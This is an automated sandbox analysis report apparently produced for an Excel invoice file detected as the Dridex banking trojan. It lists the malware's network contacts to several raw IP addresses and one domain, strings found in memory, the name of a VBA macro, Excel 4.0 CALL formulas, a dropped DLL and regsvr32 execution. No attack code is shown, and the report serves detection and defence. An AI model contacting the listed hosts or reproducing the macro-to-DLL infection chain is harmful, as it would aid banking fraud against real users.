Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_008C39F9 InternetReadFile,

4_2_008C39F9

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FECA1BF.emf

Jump to behavior

Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: education.scrollx.in

Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261028499.000000000369D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000003.2205271774.00000000003D0000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261028499.000000000369D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2409391868.0000000002390000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261214468.0000000004000000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2406957167.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2407102495.00000000009A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2257019838.00000000024C0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2409391868.0000000002390000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261214468.0000000004000000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65/
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://46.105.131.65:1512/an
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233/=
Source: regsvr32.exe, 00000004.00000003.2205277449.00000000003DD000.00000004.00000001.sdmp	String found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000004.00000002.2406908102.000000000033F000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233:3389/H
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233:3389/In
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233:3389/in
Source: regsvr32.exe, 00000004.00000002.2406908102.000000000033F000.00000004.00000020.sdmp	String found in binary or memory: https://5.100.228.233:3389/o
Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/-39;
Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp	String found in binary or memory: https://77.220.64.37/0;
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://80.86.91.27:3308/TATE
Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmp	String found in binary or memory: https://80.86.91.27:3308/XPRE
Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49338
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49334
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49330
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 49262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49294
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49354 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49290
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49322
Source: unknown	Network traffic detected: HTTP traffic on port 49330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49286
Source: unknown	Network traffic detected: HTTP traffic on port 49286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49282
Source: unknown	Network traffic detected: HTTP traffic on port 49338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 49216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49398
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49274
Source: unknown	Network traffic detected: HTTP traffic on port 49394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49390
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49306
Source: unknown	Network traffic detected: HTTP traffic on port 49326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 49290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49406 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49262
Source: unknown	Network traffic detected: HTTP traffic on port 49370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49382
Source: unknown	Network traffic detected: HTTP traffic on port 49246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49378 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49258
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49378
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49410
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49374
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49370
Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49406
Source: unknown	Network traffic detected: HTTP traffic on port 49410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49366
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49362
Source: unknown	Network traffic detected: HTTP traffic on port 49334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49358
Source: unknown	Network traffic detected: HTTP traffic on port 49398 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49228

Source: unknown	HTTPS traffic detected: 104.27.153.52:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49406 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49410 version: TLS 1.2

E-Banking Fraud:

Detected Dridex e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00895150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

4_2_00895150

Source: C:\Windows\System32\DWWIN.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Jump to dropped file

System Summary:

Document contains an embedded VBA macro which may execute processes

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")			Name: pagesREviewsd
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")			Name: pagesREviewsd

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: Inv0209966048-20210111075675.xls	Initial sample: CALL
Source: Inv0209966048-20210111075675.xls	Initial sample: CALL

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\lwjmdgav.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A22A0 NtDelayExecution,		4_2_008A22A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008BBE30 NtClose,		4_2_008BBE30

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00895150	4_2_00895150
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AE0A0	4_2_008AE0A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008BDCA0	4_2_008BDCA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B50A0	4_2_008B50A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B4CA0	4_2_008B4CA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B5CB0	4_2_008B5CB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A88C0	4_2_008A88C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A8CC0	4_2_008A8CC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A98DA	4_2_008A98DA
